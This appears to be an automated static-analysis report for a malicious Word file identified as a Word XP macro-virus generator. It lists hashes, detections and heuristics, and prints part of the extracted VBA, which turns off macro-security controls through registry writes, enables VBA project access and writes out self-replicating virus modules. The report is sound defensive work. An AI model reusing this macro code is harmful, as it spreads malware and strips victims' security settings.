Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 719b604817750930…

MALICIOUS

Office (OLE)

431.5 KB Created: 2002-01-27 11:32:00 Authoring application: Microsoft Word 10.0 First seen: 2012-06-14
MD5: f4ef3afc64dc8a5dea71c3f684c6bd60 SHA-1: 69471a1e2b89d94e1f2f2d09c6ef04af8ee76ba6 SHA-256: 719b6048177509305b084574d6b6353d3267e460ba40ff66b641219200262b24
490 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer

The sample is a Microsoft Word document containing malicious VBA macros. The macros utilize the Shell() and CreateObject() functions, indicative of attempting to download and execute a payload. Specifically, the AutoOpen macro is triggered upon opening the document, and the script attempts to download content from 'http://www.yourURL.com/payload.txt'. This suggests an attempt to download and execute a second-stage payload.

Heuristics 12

  • Raw OLE macro text shows self-replication or security tampering critical OLE_RAW_MACRO_SELF_REPLICATION
    OLE streams contain macro source text with auto-run entry points, CreateObject automation, CodeModule AddFromString/InsertLines/DeleteLines behavior, and Outlook or macro-security tampering. This is high-confidence macro-virus behavior even when oletools does not recover a standard VBA project.
  • ClamAV: Doc.Trojan.NWXPG-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.NWXPG-1
  • VBA macros detected medium 7 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.yourURL.com/payload.txt$ In document text (OLE body)
    • http://www.yourURL.com/payload.txtIn document text (OLE body)
    • http://www.microsoft.com/In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 18637 bytes
SHA-256: eb546e54a3b7f38d30a988b24105a92d5844566703b25bbe8569c89d817575e1
Detection
ClamAV: Doc.Trojan.NWXPG-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "greets"
Attribute VB_Base = "0{362686FF-5E1F-11D6-AA63-D6AB423A7137}{362686E1-5E1F-11D6-AA63-D6AB423A7137}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Click()
Assistant.Visible = True
With Assistant.NewBalloon
   .Icon = msoIconAlert
     .Text = "I hope not to forget anybody!?"
   .Heading = "Sorry people!"
    .Animation = msoAnimationCheckingSomething
   .Show
 End With
   MsgBox "ID&T Rules!!!;o)", 64, "Yo,eat this..."
Assistant.Visible = False
  greets.Hide
  End Sub

Attribute VB_Name = "nwxpg"
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'~~~Word XP Macrovirus Generator~~~
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'~~~~~~~~~ (k)opywrong by ~~~~~~~~~
'~~~~Necronomikon [ZeroGravity]~~~~
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Public one As Integer
Public plugin As String
Public URL1 As String
Public user As String
Public pass As String
Public dir As String
Public file As String

Sub AutoOpen()
ShowVisualBasicEditor = False
Application.Caption = "Word XP Macrovirus Generator (c)by Necronomikon[Zer0Gravity]"
Application.WindowState = wdWindowStateMinimize
welcome.Show
End Sub
Sub Mainprog()
On Error Resume Next
Randomize
var1$ = (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) + (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) + (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22)))
var2$ = (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) + (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) + (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22)))
var3$ = (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) + (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) + (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22)))
var4$ = (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) + (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) + (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22)))
var5$ = (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) + (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) + (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22)))
var6$ = (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) + (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22))) + (Chr(65 + Int(Rnd * 22))) + (Chr(122 - Int(Rnd * 22)))

VirusName = mainfrm.tb1
Viriis = "" & mainfrm.tb1 & "" & ".cls"
VirusName = mainfrm.tb1
Open Viriis For Output As #1
Print #1, "Attribute VB_Name = """; mainfrm.tb1

Print #1, "Private Sub Document_Open()"
Print #1, "On Error Resume Next"
Print #1, "'This Word XP virus was created using NWXPG"
Print #1, "'code by Necronomikon/[Zer0Gravity]"
Print #1, "CommandBars(""Macro"").Controls(""Security..."").Enabled = False"
Print #1, "System.PrivateProfileString(""HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security"", ""Level"") = 1&"
Print #1, "If System.PrivateProfileString(""HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security"", ""AccessVBOM"") <> 1& Then"
Print #1, "Application.AutomationSecurity = msoAutomationSecurityForceDisable"
Print #1, "System.PrivateProfileString(""HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM"") = 1&"
Print #1, "win = Environ(""windir"")"
Print #1, "docz = win & ""\re.doc"""
Print #1, "" & var1$ & " = ActiveDocument.VBPro
... (truncated)